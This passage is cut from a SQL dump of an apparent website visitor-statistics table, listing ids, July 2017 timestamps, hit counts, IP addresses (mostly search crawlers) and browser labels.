3.109','other'),(138783,1501343046,1,1,0,0,'91.209.11.236','other'),(138784,1501343091,8,8,0,0,'216.244.66.194','other'),(138785,1501343346,1,1,0,0,'37.9.113.128','other'),(138786,1501343490,1,0,1,0,'66.249.66.156',''),(138787,1501343790,1,0,1,0,'66.249.76.109',''),(138788,1501343803,1,1,0,0,'213.180.203.14','other'),(138789,1501344150,1,1,0,0,'51.255.65.5','other'),(138790,1501344370,1,1,0,0,'46.174.124.209','chrome'),(138791,1501344523,2,2,0,0,'62.210.203.161','chrome'),(138792,1501345223,1,1,0,0,'37.9.113.78','other'),(138793,1501345430,1,0,1,0,'66.249.76.93',''),(138794,1501345860,1,1,0,0,'217.182.132.28','other'),(138795,1501346374,1,1,0,0,'217.182.132.95','other'),(138796,1501346468,1,1,0,0,'78.111.190.41','firefox'),(138797,1501346736,5,5,0,0,'216.244.66.246','other'),(138798,1501346937,1,1,0,0,'217.182.132.187','other'),(138799,1501347070,1,1,0,0,'178.154.171.18','other'),(138800,1501347394,3,3,0,0,'91.209.11.236','other'),(138801,1501347735,1,1,0,0,'54.165.59.7','other'),(138802,1501348615,1,1,0,0,'217.182.132.152','other'),(138803,1501348776,1,1,0,0,'216.244.66.246','other'),(138804,1501348891,1,1,0,0,'213.180.203.43','other'),(138805,1501349653,1,1,0,0,'137.74.203.194','other'),(138806,1501349684,1,1,0,0,'217.182.132.55','other'),(138807,1501350032,1,1,0,0,'8.29.198.25','other'),(138808,1501350163,1,1,0,0,'207.46.13.1','other'),(138809,1501350209,1,1,0,0,'51.255.71.123','other'),(138810,1501350861,1,1,0,0,'5.45.207.66','other'),(138811,1501351025,1,1,0,0,'95.108.181.58','other'),(138812,1501351228,1,1,0,0,'40.77.167.43','other'),(138813,1501351356,4,4,0,0,'216.244.66.194','other'),(138814,1501352106,1,1,0,0,'51.255.65.32','other'),(138815,1501352109,1,1,0,0,'217.182.132.18','other'),(138816,1501352348,1,1,0,0,'91.209.11.236','other'),(138817,1501352537,1,1,0,0,'51.255.65.95','other'),(138818,1501352715,1,1,0,0,'178.154.171.3','other'),(138819,1501352850,4,4,0,0,'216.244.66.246','other'),(138820,1501352862,1,1,0,0,'37.73.237.217','chrome'),(138821,1501353055,1,1,0,0,'213.180.203.14','other'),(138822,1501353077,1,1,0,0,'180.76.15.149','other'),(138823,1501353128,1,1,0,0,'217.182.132.77','other'),(138824,1501353201,1,1,0,0,'217.182.132.4','other'),(138825,1501353238,1,1,0,0,'51.255.65.2','other'),(138826,1501353696,1,1,0,0,'213.180.203.32','other'),(138827,1501353758,1,1,0,0,'178.154.171.18','other'),(138828,1501353961,5,5,0,0,'216.244.66.246','other'),(138829,1501354527,1,1,0,0,'51.255.71.120','other'),(138830,1501354539,2,2,0,0,'201.18.18.173','chrome'),(138831,1501354742,2,2,0,0,'95.108.181.52','other'),(138832,1501355245,2,0,2,0,'66.249.76.108',''),(138833,1501355261,1,1,0,0,'213.180.203.42','other'),(138834,1501355373,1,1,0,0,'5.45.207.64','other'),(138835,1501355450,1,1,0,0,'51.255.71.126','other'),(138836,1501355590,1,1,0,0,'178.154.171.18','other'),(138837,1501355673,1,1,0,0,'51.255.71.132','other'),(138838,1501355804,1,1,0,0,'217.182.132.77','other'),(138839,1501355926,1,1,0,0,'217.182.132.82','other'),(138840,1501355993,5,5,0,0,'5.189.138.36','other'),(138841,1501356182,1,1,0,0,'217.182.132.93','other'),(138842,1501356593,3,3,0,0,'216.244.66.194','other'),(138843,1501358375,3,3,0,0,'5.189.170.122','other'),(138844,1501358480,1,1,0,0,'51.255.65.73','other'),(138845,1501358521,1,1,0,0,'91.196.178.168','chrome'),(138846,1501358554,4,4,0,0,'216.244.66.194','other'),(138847,1501358555,1,1,0,0,'164.132.162.154','other'),(138848,1501358579,1,1,0,0,'51.255.71.110','other'),(138849,1501358647,1,1,0,0,'213.180.203.14','other'),(138850,1501358652,1,1,0,0,'217.182.132.34','other'),(138851,1501359356,1,1,0,0,'217.182.132.184','other'),(138852,1501360868,1,1,0,0,'8.29.198.26','other'),(138853,1501361263,1,0,1,0,'66.249.66.76',''),(138854,1501361874,1,1,0,0,'5.45.207.64','other'),(138855,1501361895,1,1,0,0,'217.182.132.85','other'),(138856,1501362321,1,1,0,0,'217.182.132.16','other'),(138857,1501362430,3,3,0,0,'216.244.66.246','other'),(138858,1501362519,1,1,0,0,'66.249.76.107','chrome'),(138859,1501362938,1,1,0,0,'178.154.171.53','other'),(138860,1501363391,2,2,0,0,'62.210.203.161','chrome'),(138861,1501363424,1,1,0,0,'137.74.207.110','other'),(138862,1501363969,3,3,0,0,'216.244.66.194','other'),(138863,1501364066,1,0,1,0,'66.249.76.107',''),(138864,1501364175,1,1,0,0,'164.132.162.159','other'),(138865,1501364195,1,1,0,0,'213.180.203.43','other'),(138866,1501364321,1,0,1,0,'66.249.76.109',''),(138867,1501364600,1,1,0,0,'66.249.66.75','chrome'),(138868,1501364643,1,1,0,0,'217.182.132.185','other'),(138869,1501364848,1,1,0,0,'217.182.132.87','other'),(138870,1501364951,1,1,0,0,'217.182.132.91','other'),(138871,1501365137,1,1,0,0,'217.69.133.203','other'),(138872,1501365335,1,1,0,0,'213.180.203.14','other'),(138873,1501365575,1,0,1,0,'66.249.76.109',''),(138874,1501365916,4,4,0,0,'216.244.66.194','other'),(138875,1501366425,1,1,0,0,'137.74.207.161','other'),(138876,1501366593,1,1,0,0,'178.154.171.3','other'),(138877,1501366680,1,1,0,0,'151.80.27.116','other'),(138878,1501366913,1,1,0,0,'207.46.13.1','other'),(138879,1501367195,1,1,0,0,'5.45.207.64','other'),(138880,1501367780,8,8,0,0,'216.244.66.246','other'),(138881,1501367978,1,1,0,0,'137.74.207.110','other'),(138882,1501368100,1,0,1,0,'66.249.66.74',''),(138883,1501368421,1,1,0,0,'40.77.167.43','other'),(138884,1501368936,5,5,0,0,'158.69.251.119','other'),(138885,1501369081,1,1,0,0,'164.132.162.155','other'),(138886,1501369401,1,1,0,0,'217.182.132.84','other'),(138887,1501369425,1,1,0,0,'217.182.132.241','other'),(138888,1501369449,1,1,0,0,'51.255.65.61','other'),(138889,1501369569,1,1,0,0,'51.255.65.88','other'),(138890,1501369688,1,1,0,0,'213.180.203.18','other'),(138891,1501370016,1,1,0,0,'217.182.132.30','other'),(138892,1501370308,3,3,0,0,'46.30.167.229','other'),(138893,1501370815,1,1,0,0,'95.108.181.60','other'),(138894,1501371058,1,1,0,0,'164.132.162.187','other'),(138895,1501371317,1,1,0,0,'217.182.132.149','other'),(138896,1501371544,1,1,0,0,'178.154.171.59','other'),(138897,1501371572,1,1,0,0,'217.182.132.170','other'),(138898,1501371585,1,1,0,0,'213.180.203.21','other'),(138899,1501371603,1,1,0,0,'217.182.132.52','other'),(138900,1501371692,1,1,0,0,'217.182.132.90','other'),(138901,1501371696,1,1,0,0,'8.29.198.25','other'),(138902,1501372126,1,1,0,0,'137.74.201.108','other'),(138903,1501372875,1,1,0,0,'217.182.132.185','other'),(138904,1501373310,1,1,0,0,'51.255.65.75','other'),(138905,1501373475,2,2,0,0,'46.229.168.65','other'),(138906,1501373480,5,5,0,0,'46.229.168.79','other'),(138907,1501373499,7,7,0,0,'46.229.168.67','other'),(138908,1501373501,1,1,0,0,'95.108.181.57','other'),(138909,1501373517,2,2,0,0,'46.229.168.80','other'),(138910,1501373612,1,0,1,0,'66.249.76.109',''),(138911,1501373636,6,6,0,0,'46.229.168.73','other'),(138912,1501373675,3,3,0,0,'46.229.168.66','other'),(138913,1501373681,1,1,0,0,'37.9.113.138','other'),(138914,1501373780,5,5,0,0,'46.229.168.74','other'),(138915,1501373784,2,2,0,0,'216.244.66.194','other'),(138916,1501373798,1,1,0,0,'46.229.168.72','other'),(138917,1501373858,7,7,0,0,'46.229.168.77','other'),(138918,1501373902,5,5,0,0,'46.229.168.78','other'),(138919,1501373937,5,5,0,0,'46.229.168.75','other'),(138920,1501373972,1,1,0,0,'217.182.132.62','other'),(138921,1501374026,1,1,0,0,'213.180.203.25','other'),(138922,1501374039,1,1,0,0,'217.182.132.37','other'),(138923,1501374150,4,4,0,0,'46.229.168.76','other'),(138924,1501374167,3,3,0,0,'46.229.168.71','other'),(138925,1501374187,5,5,0,0,'46.229.168.68','other'),(138926,1501374281,10,10,0,0,'46.229.168.70','other'),(138927,1501374393,2,2,0,0,'46.229.168.69','other'),(138928,1501374545,6,6,0,0,'46.229.168.73','other'),(138929,1501374563,2,2,0,0,'46.229.168.67','other'),(138930,1501374687,1,1,0,0,'51.255.65.40','other'),(138931,1501374722,4,4,0,0,'46.229.168.74','other'),(138932,1501374759,4,4,0,0,'46.229.168.65','other'),(138933,1501374784,3,3,0,0,'46.229.168.66','other'),(138934,1501374795,5,5,0,0,'46.229.168.79','other'),(138935,1501374853,3,3,0,0,'46.229.168.80','other'),(138936,1501374930,8,8,0,0,'216.244.66.246','other'),(138937,1501374931,2,2,0,0,'46.229.168.78','other'),(138938,1501374949,3,3,0,0,'46.229.168.75','other'),(138939,1501375192,2,2,0,0,'46.229.168.76','other'),(138940,1501375229,4,4,0,0,'46.229.168.68','other'),(138941,1501375267,4,4,0,0,'46.229.168.72','other'),(138942,1501375378,1,1,0,0,'46.229.168.71','other'),(138943,1501375419,1,1,0,0,'46.229.168.77','other'),(138944,1501375505,1,1,0,0,'46.229.168.73','other'),(138945,1501375617,2,2,0,0,'46.229.168.67','other'),(138946,1501375648,1,1,0,0,'46.229.168.69','other'),(138948,1501375674,1,1,0,0,'46.229.168.74','other'),(138949,1501375704,2,2,0,0,'46.229.168.65','other'),(138950,1501375743,1,1,0,0,'46.229.168.70','other'),(138951,1501375759,1,1,0,0,'46.229.168.80','other'),(138952,1501376127,4,4,0,0,'216.244.66.194','other'),(138953,1501376176,1,1,0,0,'5.45.207.57','other'),(138954,1501376495,1,1,0,0,'217.182.132.64','other'),(138955,1501376564,1,1,0,0,'207.46.13.1','other'),(138956,1501376848,1,1,0,0,'51.255.65.77','other'),(138957,1501377233,1,1,0,0,'92.113.191.60','other'),(138958,1501377281,1,1,0,0,'164.132.162.156','other'),(138959,1501377723,1,1,0,0,'217.182.132.5','other'),(138960,1501377911,1,1,0,0,'51.255.71.111','other'),(138961,1501378196,1,1,0,0,'217.69.133.5','other'),(138962,1501378816,1,1,0,0,'66.249.66.156','chrome'),(138963,1501379487,1,1,0,0,'216.244.66.246','other'),(138964,1501380029,1,1,0,0,'5.45.207.83','other'),(138965,1501380059,1,1,0,0,'51.255.65.34','other'),(138966,1501380201,1,1,0,0,'213.180.203.14','other'),(138967,1501380244,1,1,0,0,'40.77.167.43','other'),(138968,1501380471,1,1,0,0,'217.182.132.63','other'),(138969,1501380510,1,1,0,0,'51.255.71.118','other'),(138970,1501381910,1,1,0,0,'217.182.132.96','other'),(138971,1501382133,1,0,1,0,'66.249.76.108',''),(138972,1501382164,1,1,0,0,'37.9.113.78','other'),(138973,1501382449,1,1,0,0,'216.244.66.194','other'),(138974,1501382525,1,1,0,0,'8.29.198.25','other'),(138975,1501383457,1,1,0,0,'91.209.11.236','other'),(138976,1501383509,2,2,0,0,'216.244.66.194','other'),(138977,1501383601,2,2,0,0,'216.244.66.246','other'),(138978,1501383849,1,1,0,0,'51.255.65.96','other'),(138979,1501384068,1,1,0,0,'217.69.133.2','other'),(138980,1501384281,1,0,1,0,'66.249.76.108',''),(138981,1501385140,1,1,0,0,'137.74.207.161','other'),(138982,1501385685,1,1,0,0,'178.154.171.18','other'),(138983,1501385790,1,1,0,0,'51.255.65.52','other'),(138984,1501385820,1,1,0,0,'157.55.39.153','other'),(138985,1501385965,1,1,0,0,'217.69.133.2','other'),(138986,1501386129,1,1,0,0,'51.255.65.65','other'),(138987,1501386232,1,1,0,0,'217.182.132.70','other'),(138988,1501386445,1,1,0,0,'51.255.65.55','other'),(138989,1501386535,1,1,0,0,'5.45.207.66','other'),(138990,1501386688,1,1,0,0,'51.255.65.96','other'),(138991,1501387066,1,1,0,0,'217.182.132.30','other'),(138992,1501387412,1,1,0,0,'51.255.65.39','other'),(138993,1501387630,1,1,0,0,'51.255.65.3','other'),(138994,1501388067,1,1,0,0,'46.188.0.205','msie'),(138995,1501388309,1,1,0,0,'91.209.11.236','other'),(138996,1501388501,1,1,0,0,'95.108.181.52','other'),(138997,1501389006,1,1,0,0,'217.182.132.55','other'),(138998,1501389434,1,1,0,0,'51.255.65.83','other'),(138999,1501389958,1,1,0,0,'51.255.65.44','other'),(139000,1501390423,1,1,0,0,'178.154.171.36','other'),(139001,1501390428,1,1,0,0,'213.180.203.14','other'),(139002,1501390806,1,1,0,0,'180.76.15.157','other'),(139003,1501391247,1,1,0,0,'188.32.176.228','msie'),(139004,1501391549,1,1,0,0,'216.244.66.194','other'),(139005,1501391573,1,1,0,0,'213.180.203.14','other'),(139006,1501391690,1,1,0,0,'178.154.171.18','other'),(139007,1501391692,1,1,0,0,'217.69.133.3','other'),(139008,1501391940,1,1,0,0,'217.182.132.191','other'),(139009,1501392682,1,1,0,0,'5.45.207.64','other'),(139010,1501392843,1,1,0,0,'217.182.132.87','other'),(139011,1501392973,1,1,0,0,'217.182.132.59','other'),(139012,1501393353,1,1,0,0,'8.29.198.27','other'),(139013,1501393595,8,8,0,0,'216.244.66.246','other'),(139014,1501393837,5,5,0,0,'176.9.11.125','other'),(139015,1501393927,1,1,0,0,'217.182.132.184','other'),(139016,1501394437,1,1,0,0,'51.255.65.64','other'),(139017,1501394465,1,1,0,0,'217.182.132.86','other'),(139018,1501394660,1,1,0,0,'5.45.207.83','other'),(139019,1501394770,1,1,0,0,'213.180.203.43','other'),(139020,1501394944,1,1,0,0,'51.255.65.79','other'),(139021,1501394995,1,1,0,0,'216.244.66.194','other'),(139022,1501395022,1,1,0,0,'213.180.203.42','other'),(139023,1501395030,1,1,0,0,'66.249.64.30','chrome'),(139024,1501395195,1,1,0,0,'95.220.38.119','msie'),(139025,1501395197,1,1,0,0,'176.193.245.82','msie'),(139026,1501395878,1,1,0,0,'95.108.181.52','other'),(139027,1501395903,1,1,0,0,'37.9.113.128','other'),(139028,1501395959,1,1,0,0,'217.182.132.18','other'),(139029,1501395982,1,1,0,0,'213.180.203.42','other'),(139030,1501395985,1,1,0,0,'213.180.203.39','other'),(139031,1501396049,1,1,0,0,'178.154.171.59','other'),(139032,1501396256,1,1,0,0,'5.45.207.54','other'),(139033,1501396764,1,0,1,0,'66.249.64.30',''),(139034,1501397131,1,1,0,0,'37.9.113.66','other'),(139035,1501397169,2,2,0,0,'5.45.207.64','other'),(139036,1501397246,6,6,0,0,'216.244.66.246','other'),(139037,1501397483,1,1,0,0,'5.45.207.66','other'),(139038,1501397577,1,1,0,0,'185.26.180.169','other'),(139039,1501397579,1,1,0,0,'178.154.171.45','other'),(139040,1501397624,1,1,0,0,'95.108.181.60','other'),(139041,1501397663,1,1,0,0,'178.154.171.3','other'),(139042,1501397889,1,1,0,0,'207.46.13.109','other'),(139043,1501397905,1,1,0,0,'37.9.113.94','other'),(139044,1501397931,1,0,1,0,'66.249.64.29',''),(139045,1501398071,1,1,0,0,'51.255.65.3','other'),(139046,1501398627,1,1,0,0,'66.249.64.30','chrome'),(139047,1501398898,1,0,1,0,'66.249.64.155',''),(139048,1501399012,1,1,0,0,'51.255.65.57','other'),(139049,1501399156,1,1,0,0,'217.182.132.171','other'),(139050,1501399224,1,1,0,0,'217.182.132.65','other'),(139051,1501399286,1,1,0,0,'51.255.65.45','other'),(139052,1501399498,1,1,0,0,'40.77.167.43','other'),(139053,1501400533,1,1,0,0,'66.249.64.28','chrome'),(139054,1501400560,1,1,0,0,'95.108.181.52','other'),(139055,1501400990,1,1,0,0,'37.9.113.78','other'),(139056,1501401217,1,1,0,0,'217.182.132.152','other'),(139057,1501402036,1,0,1,0,'66.249.64.30',''),(139058,1501402095,1,1,0,0,'185.192.109.167','firefox'),(139059,1501402429,1,1,0,0,'217.182.132.186','other'),(139060,1501402433,1,0,1,0,'66.249.64.28',''),(139061,1501402476,1,1,0,0,'37.73.255.246','chrome'),(139062,1501402524,1,0,1,0,'66.249.64.29',''),(139063,1501402606,1,1,0,0,'51.255.65.59','other'),(139064,1501402662,1,1,0,0,'37.9.113.66','other'),(139065,1501402762,1,1,0,0,'51.255.71.132','other'),(139066,1501403176,1,1,0,0,'95.108.181.52','other'),(139067,1501403200,1,1,0,0,'66.249.64.29','chrome'),(139068,1501403211,1,1,0,0,'217.69.133.203','other'),(139069,1501403224,1,1,0,0,'217.69.133.194','other'),(139070,1501403518,1,1,0,0,'217.182.132.86','other'),(139071,1501403686,1,1,0,0,'95.108.181.63','other'),(139072,1501403695,1,1,0,0,'95.108.181.60','other'),(139073,1501403986,1,1,0,0,'178.154.171.72','other'),(139074,1501404184,1,1,0,0,'8.29.198.26','other'),(139075,1501404281,1,1,0,0,'157.55.39.153','other'),(139076,1501404409,1,1,0,0,'207.46.13.109','other'),(139077,1501404417,12,12,0,0,'216.244.66.246','other'),(139078,1501404653,1,0,1,0,'66.249.64.29',''),(139079,1501404851,1,1,0,0,'66.102.9.29','chrome'),(139080,1501405024,1,1,0,0,'95.108.181.60','other'),(139081,1501405097,1,1,0,0,'188.32.176.228','msie'),(139082,1501405154,1,1,0,0,'213.180.203.32','other'),(139083,1501405373,1,1,0,0,'5.45.207.66','other'),(139084,1501405401,1,1,0,0,'51.255.71.115','other'),(139085,1501405679,1,1,0,0,'5.45.207.57','other'),(139086,1501405924,1,1,0,0,'37.204.68.12','msie'),(139087,1501405948,1,1,0,0,'5.45.207.83','other'),(139088,1501406080,1,1,0,0,'37.9.113.78','other'),(139089,1501406129,1,1,0,0,'5.45.207.56','other'),(139090,1501406427,1,0,1,0,'66.249.64.28',''),(139091,1501407005,1,1,0,0,'217.182.132.174','other'),(139092,1501407028,1,1,0,0,'217.69.133.194','other'),(139093,1501407135,2,2,0,0,'162.210.196.98','other'),(139094,1501407163,1,1,0,0,'5.45.207.64','other'),(139095,1501407284,2,1,1,0,'66.249.64.153',''),(139096,1501407346,1,1,0,0,'37.9.113.138','other'),(139097,1501407350,1,1,0,0,'213.180.203.32','other'),(139098,1501407496,1,1,0,0,'109.63.201.179','msie'),(139099,1501407935,1,1,0,0,'95.28.172.46','msie'),(139100,1501407945,1,1,0,0,'46.161.9.39','firefox'),(139101,1501408073,1,1,0,0,'85.198.185.138','chrome'),(139102,1501408273,1,1,0,0,'5.228.35.210','msie'),(139103,1501408434,1,1,0,0,'37.9.113.66','other'),(139104,1501408499,1,1,0,0,'213.180.203.42','other'),(139105,1501408541,1,1,0,0,'195.154.168.130','chrome'),(139106,1501409004,1,1,0,0,'217.69.133.9','other'),(139107,1501409311,1,1,0,0,'95.108.181.52','other'),(139108,1501409508,1,1,0,0,'95.108.181.57','other'),(139109,1501409542,1,1,0,0,'5.45.207.64','other'),(139110,1501409810,1,1,0,0,'51.255.71.98','other'),(139111,1501410389,2,2,0,0,'216.244.66.194','other'),(139112,1501411183,1,1,0,0,'66.249.64.29','chrome'),(139113,1501411283,1,1,0,0,'178.154.171.42','other'),(139114,1501411284,1,1,0,0,'217.182.132.83','other'),(139115,1501411376,1,1,0,0,'216.244.66.246','other'),(139116,1501411419,1,1,0,0,'5.45.207.64','other'),(139117,1501411468,1,1,0,0,'95.108.181.58','other'),(139118,1501411911,1,1,0,0,'37.9.113.138','other'),(139119,1501412080,1,1,0,0,'51.255.65.36','other'),(139120,1501412320,1,1,0,0,'51.255.65.9','other'),(139121,1501412376,1,1,0,0,'217.182.132.148','other'),(139122,1501412452,1,1,0,0,'213.180.203.14','other'),(139123,1501412490,1,1,0,0,'51.255.65.18','other'),(139124,1501412491,1,1,0,0,'5.45.207.57','other'),(139125,1501412499,1,1,0,0,'66.249.64.30','chrome'),(139126,1501412550,1,1,0,0,'213.180.203.25','other'),(139127,1501412861,1,1,0,0,'95.108.181.69','other'),(139128,1501412913,1,1,0,0,'5.45.207.56','other'),(139129,1501413153,4,4,0,0,'216.244.66.194','other'),(139130,1501413232,1,0,1,0,'66.249.64.29',''),(139131,1501413366,1,1,0,0,'66.249.64.29','chrome'),(139132,1501413538,1,1,0,0,'95.108.181.57','other'),(139133,1501413589,1,1,0,0,'5.45.207.83','other'),(139134,1501413635,3,3,0,0,'216.244.66.246','other'),(139135,1501413740,1,1,0,0,'178.154.171.18','other'),(139136,1501413846,1,1,0,0,'5.45.207.56','other'),(139137,1501414049,1,1,0,0,'5.45.207.64','other'),(139138,1501414184,1,1,0,0,'164.132.162.156','other'),(139139,1501414482,1,1,0,0,'217.182.132.84','other'),(139140,1501414543,1,1,0,0,'157.55.39.153','other'),(139141,1501414663,2,1,1,0,'66.249.64.30',''),(139142,1501414741,1,1,0,0,'217.182.132.68','other'),(139143,1501414983,3,3,0,0,'216.244.66.246','other'),(139144,1501415011,1,1,0,0,'8.29.198.27','other'),(139145,1501415269,1,1,0,0,'51.255.71.116','other'),(139146,1501415771,1,1,0,0,'151.80.27.118','other'),(139147,1501415907,1,1,0,0,'66.249.64.30','chrome'),(139148,1501415936,1,1,0,0,'213.180.203.14','other'),(139149,1501416146,1,1,0,0,'51.255.65.20','other'),(139150,1501416379,1,1,0,0,'37.9.113.78','other'),(139151,1501416383,1,1,0,0,'217.182.132.182','other'),(139152,1501416441,1,1,0,0,'94.180.218.77','msie'),(139153,1501416576,1,1,0,0,'51.255.65.43','other'),(139154,1501416615,1,1,0,0,'37.204.68.12','msie'),(139155,1501417548,1,1,0,0,'51.255.65.42','other'),(139156,1501417550,1,1,0,0,'217.182.132.36','other'),(139157,1501417920,1,1,0,0,'178.154.171.53','other'),(139158,1501417933,1,1,0,0,'95.220.38.119','msie'),(139159,1501418107,1,1,0,0,'178.154.171.59','other'),(139160,1501418240,1,1,0,0,'176.193.117.203','msie'),(139161,1501418346,1,1,0,0,'51.255.65.79','other'),(139162,1501418439,1,1,0,0,'213.180.203.43','other'),(139163,1501418717,1,1,0,0,'51.255.65.57','other'),(139164,1501418784,1,1,0,0,'66.249.64.29','chrome'),(139165,1501418807,1,1,0,0,'51.255.65.81','other'),(139166,1501418861,1,1,0,0,'95.28.172.46','msie'),(139167,1501419084,1,1,0,0,'178.154.171.59','other'),(139168,1501419609,1,1,0,0,'51.255.71.117','other'),(139169,1501419650,1,1,0,0,'217.182.132.67','other'),(139170,1501419886,1,0,1,0,'66.249.64.28',''),(139171,1501420341,1,1,0,0,'95.108.181.58','other'),(139172,1501420485,1,1,0,0,'217.69.133.3','other'),(139173,1501421011,1,1,0,0,'217.182.132.5','other'),(139174,1501421020,1,1,0,0,'178.154.171.45','other'),(139175,1501421415,1,1,0,0,'51.255.65.7','other'),(139176,1501421660,1,1,0,0,'216.244.66.246','other'),(139177,1501421697,7,7,0,0,'144.76.38.73','other'),(139178,1501421729,1,1,0,0,'95.108.181.58','other'),(139179,1501421880,1,1,0,0,'157.55.39.153','other'),(139180,1501421994,1,1,0,0,'37.9.113.66','other'),(139181,1501422009,1,1,0,0,'137.74.207.116','other'),(139182,1501422109,1,1,0,0,'213.180.203.25','other'),(139184,1501422230,1,1,0,0,'51.255.65.82','other'),(139185,1501422388,1,1,0,0,'37.9.113.128','other'),(139186,1501422392,1,1,0,0,'178.154.171.45','other'),(139187,1501422427,1,0,1,0,'66.249.64.29',''),(139188,1501422479,1,1,0,0,'37.9.113.78','other'),(139189,1501422742,1,1,0,0,'213.180.203.42','other'),(139190,1501422924,2,2,0,0,'37.9.113.94','other'),(139191,1501423716,1,1,0,0,'95.108.181.57','other'),(139192,1501423805,1,1,0,0,'178.154.171.45','other'),(139193,1501424056,1,1,0,0,'5.45.207.64','other'),(139194,1501424189,1,1,0,0,'37.9.113.66','other'),(139195,1501424316,1,1,0,0,'217.69.133.6','other'),(139196,1501424354,1,1,0,0,'51.255.65.87','other'),(139197,1501424378,5,5,0,0,'216.244.66.194','other'),(139198,1501424676,1,0,1,0,'66.249.64.30',''),(139199,1501424912,1,1,0,0,'176.31.231.10','other'),(139200,1501425020,1,1,0,0,'51.255.65.11','other'),(139201,1501425055,6,6,0,0,'216.244.66.246','other'),(139202,1501425502,1,1,0,0,'207.46.13.109','other'),(139203,1501425625,1,1,0,0,'95.108.181.69','other'),(139204,1501425835,1,1,0,0,'8.29.198.25','other'),(139205,1501425960,1,1,0,0,'213.180.203.14','other'),(139206,1501426171,1,1,0,0,'37.55.227.38','chrome'),(139207,1501426189,1,1,0,0,'217.69.133.194','other'),(139208,1501426437,1,1,0,0,'188.32.176.228','msie'),(139209,1501426671,1,1,0,0,'5.45.207.83','other'),(139210,1501426837,1,1,0,0,'5.45.207.57','other'),(139211,1501426843,1,1,0,0,'5.45.207.56','other'),(139212,1501426896,1,1,0,0,'213.180.203.42','other'),(139213,1501426957,1,1,0,0,'95.108.181.57','other'),(139214,1501427124,1,1,0,0,'178.154.171.59','other'),(139215,1501427135,1,1,0,0,'51.255.65.75','other'),(139216,1501427361,1,1,0,0,'164.132.162.187','other'),(139217,1501427383,1,1,0,0,'195.154.168.130','chrome'),(139218,1501427511,1,1,0,0,'95.108.181.60','other'),(139219,1501427564,1,1,0,0,'178.154.171.45','other'),(139220,1501427656,1,1,0,0,'217.182.132.92','other'),(139221,1501427790,1,1,0,0,'95.158.189.118','other'),(139222,1501428003,1,1,0,0,'5.45.207.56','other'),(139223,1501428988,1,1,0,0,'217.182.132.21','other'),(139224,1501428999,1,1,0,0,'176.192.189.218','msie'),(139225,1501429547,2,2,0,0,'95.158.189.118','other'),(139226,1501429693,1,1,0,0,'37.204.68.12','msie'),(139227,1501429694,1,1,0,0,'46.188.0.205','msie'),(139228,1501430055,1,1,0,0,'37.9.113.78','other'),(139229,1501430361,1,1,0,0,'213.180.203.18','other'),(139230,1501430383,1,1,0,0,'95.108.181.52','other'),(139231,1501430410,1,0,1,0,'66.249.64.29',''),(139232,1501430590,1,1,0,0,'51.255.65.25','other'),(139233,1501430698,1,1,0,0,'217.182.132.190','other'),(139234,1501430965,1,1,0,0,'95.108.181.60','other'),(139235,1501431004,1,1,0,0,'5.45.207.66','other'),(139236,1501431258,1,1,0,0,'95.108.181.63','other'),(139237,1501431627,2,2,0,0,'37.9.113.94','other'),(139238,1501431750,1,1,0,0,'213.180.203.43','other'),(139239,1501431878,1,1,0,0,'217.69.133.3','other'),(139240,1501431896,1,1,0,0,'217.69.133.203','other'),(139241,1501432043,2,2,0,0,'178.154.171.3','other'),(139242,1501432046,1,1,0,0,'95.108.181.69','other'),(139243,1501432159,1,1,0,0,'213.180.203.32','other'),(139244,1501432345,1,1,0,0,'5.45.207.64','other'),(139245,1501432740,1,1,0,0,'5.45.207.66','other'),(139246,1501432788,1,1,0,0,'51.255.71.130','other'),(139247,1501432790,2,2,0,0,'37.9.113.138','other'),(139248,1501433114,1,0,1,0,'66.249.64.28',''),(139249,1501433519,1,0,1,0,'68.180.229.223',''),(139250,1501433584,1,1,0,0,'217.182.132.81','other'),(139251,1501433646,4,4,0,0,'216.244.66.194','other'),(139252,1501433715,1,1,0,0,'95.108.181.63','other'),(139253,1501433747,1,1,0,0,'51.255.65.70','other'),(139254,1501433903,1,1,0,0,'51.255.65.43','other'),(139255,1501434142,1,1,0,0,'51.255.65.45','other'),(139256,1501434269,1,1,0,0,'213.180.203.21','other'),(139257,1501434558,1,1,0,0,'51.255.71.113','other'),(139258,1501434750,1,1,0,0,'217.182.132.93','other'),(139259,1501434772,2,2,0,0,'216.244.66.246','other'),(139260,1501435049,1,1,0,0,'217.182.132.172','other'),(139261,1501435080,1,1,0,0,'178.154.171.59','other'),(139262,1501435090,1,1,0,0,'37.9.113.66','other'),(139263,1501435307,1,1,0,0,'51.255.65.8','other'),(139264,1501435364,1,1,0,0,'180.76.15.153','other'),(139265,1501435478,1,1,0,0,'51.255.65.93','other'),(139266,1501435729,1,1,0,0,'217.69.133.194','other'),(139267,1501436234,1,1,0,0,'217.182.132.87','other'),(139268,1501436247,1,1,0,0,'217.182.132.150','other'),(139269,1501436293,2,2,0,0,'216.244.66.246','other'),(139270,1501436662,1,1,0,0,'8.29.198.25','other'),(139271,1501436874,1,1,0,0,'217.182.132.28','other'),(139272,1501437028,1,1,0,0,'51.255.65.17','other'),(139273,1501437030,1,1,0,0,'37.9.113.138','other'),(139274,1501437095,1,1,0,0,'92.113.191.60','other'),(139275,1501437147,8,8,0,0,'216.244.66.194','other'),(139276,1501437269,1,1,0,0,'51.255.65.10','other'),(139277,1501437288,1,1,0,0,'66.249.64.28','chrome'),(139278,1501437291,1,1,0,0,'5.45.207.57','other'),(139279,1501437329,1,1,0,0,'95.108.181.52','other'),(139280,1501437550,1,1,0,0,'95.132.25.252','firefox'),(139281,1501437662,1,1,0,0,'178.154.171.59','other'),(139282,1501438031,1,1,0,0,'188.32.176.228','msie'),(139283,1501438322,1,1,0,0,'37.204.68.12','msie'),(139284,1501438357,1,1,0,0,'95.108.181.57','other'),(139285,1501438535,1,1,0,0,'51.255.65.82','other'),(139286,1501438761,1,1,0,0,'37.9.113.66','other'),(139287,1501438854,1,1,0,0,'213.180.203.32','other'),(139288,1501438903,1,1,0,0,'217.182.132.191','other'),(139289,1501438986,1,1,0,0,'37.9.113.94','other'),(139290,1501439011,1,1,0,0,'213.180.203.21','other'),(139291,1501439168,1,1,0,0,'66.249.64.28','chrome'),(139292,1501439655,1,1,0,0,'5.228.35.210','msie'),(139293,1501440190,1,1,0,0,'217.182.132.95','other'),(139294,1501440194,1,1,0,0,'95.220.200.179','msie'),(139295,1501440231,1,1,0,0,'157.55.39.153','other'),(139296,1501440359,1,1,0,0,'46.188.0.205','msie'),(139297,1501440363,1,1,0,0,'95.108.181.57','other'),(139298,1501440431,1,1,0,0,'178.154.171.45','other'),(139299,1501440503,1,1,0,0,'217.182.132.178','other'),(139300,